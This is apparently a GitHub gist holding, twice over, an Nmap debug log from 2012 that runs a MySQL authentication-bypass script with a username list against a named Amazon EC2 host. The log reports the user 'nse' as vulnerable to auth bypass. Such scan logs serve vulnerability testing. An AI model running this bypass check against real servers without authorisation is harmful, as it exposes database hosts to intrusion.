marcwickenden/gist:2918314

## gistfile1.txt
# nmap -v -d --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:59 BST
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 0
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
mass_rdns: Using DNS server 8.8.8.8
Initiating Parallel DNS resolution of 1 host. at 14:59
mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]
Completed Parallel DNS resolution of 1 host. at 14:59, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:59
Scanning ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79) [1 port]
Packet capture filter (device eth1): dst host 10.150.0.143 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 46.137.134.79)))
Discovered open port 3306/tcp on 46.137.134.79
Completed SYN Stealth Scan at 14:59, 0.05s elapsed (1 total ports)
Overall sending rates: 18.58 packets / s, 817.43 bytes / s.
NSE: Script scanning 46.137.134.79.
NSE: Starting runlevel 1 (of 1) scan.
NSE: Starting mysql-auth-bypass against 46.137.134.79:3306.
Initiating NSE at 14:59
NSE: Trying nse ...
NSE: Finished mysql-auth-bypass against 46.137.134.79:3306.
Completed NSE at 15:00, 16.25s elapsed
Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79)
Host is up, received user-set (0.052s latency).
Scanned at 2012-06-12 14:59:58 BST for 16s
PORT     STATE SERVICE REASON
3306/tcp open  mysql   syn-ack
| mysql-auth-bypass:
|_  user nse is vulnerable to auth bypass
Final times for host: srtt: 51988 rttvar: 51988  to: 259940

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Read from /usr/local/bin/../share/nmap: nmap-payloads nmap-services.
Nmap done: 1 IP address (1 host up) scanned in 16.39 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
	# nmap -v -d --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com

	Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:59 BST
	--------------- Timing report ---------------
	hostgroups: min 1, max 100000
	rtt-timeouts: init 1000, min 100, max 10000
	max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
	parallelism: min 0, max 0
	max-retries: 10, host-timeout: 0
	min-rate: 0, max-rate: 0
	---------------------------------------------
	NSE: Loaded 1 scripts for scanning.
	NSE: Script Pre-scanning.
	NSE: Starting runlevel 1 (of 1) scan.
	mass_rdns: Using DNS server 8.8.8.8
	Initiating Parallel DNS resolution of 1 host. at 14:59
	mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]
	Completed Parallel DNS resolution of 1 host. at 14:59, 0.00s elapsed
	DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
	Initiating SYN Stealth Scan at 14:59
	Scanning ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79) [1 port]
	Packet capture filter (device eth1): dst host 10.150.0.143 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 46.137.134.79)))
	Discovered open port 3306/tcp on 46.137.134.79
	Completed SYN Stealth Scan at 14:59, 0.05s elapsed (1 total ports)
	Overall sending rates: 18.58 packets / s, 817.43 bytes / s.
	NSE: Script scanning 46.137.134.79.
	NSE: Starting runlevel 1 (of 1) scan.
	NSE: Starting mysql-auth-bypass against 46.137.134.79:3306.
	Initiating NSE at 14:59
	NSE: Trying nse ...
	NSE: Finished mysql-auth-bypass against 46.137.134.79:3306.
	Completed NSE at 15:00, 16.25s elapsed
	Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79)
	Host is up, received user-set (0.052s latency).
	Scanned at 2012-06-12 14:59:58 BST for 16s
	PORT STATE SERVICE REASON
	3306/tcp open mysql syn-ack
	\| mysql-auth-bypass:
	\|_ user nse is vulnerable to auth bypass
	Final times for host: srtt: 51988 rttvar: 51988 to: 259940

	NSE: Script Post-scanning.
	NSE: Starting runlevel 1 (of 1) scan.
	Read from /usr/local/bin/../share/nmap: nmap-payloads nmap-services.
	Nmap done: 1 IP address (1 host up) scanned in 16.39 seconds
	Raw packets sent: 1 (44B) \| Rcvd: 1 (44B)
No results found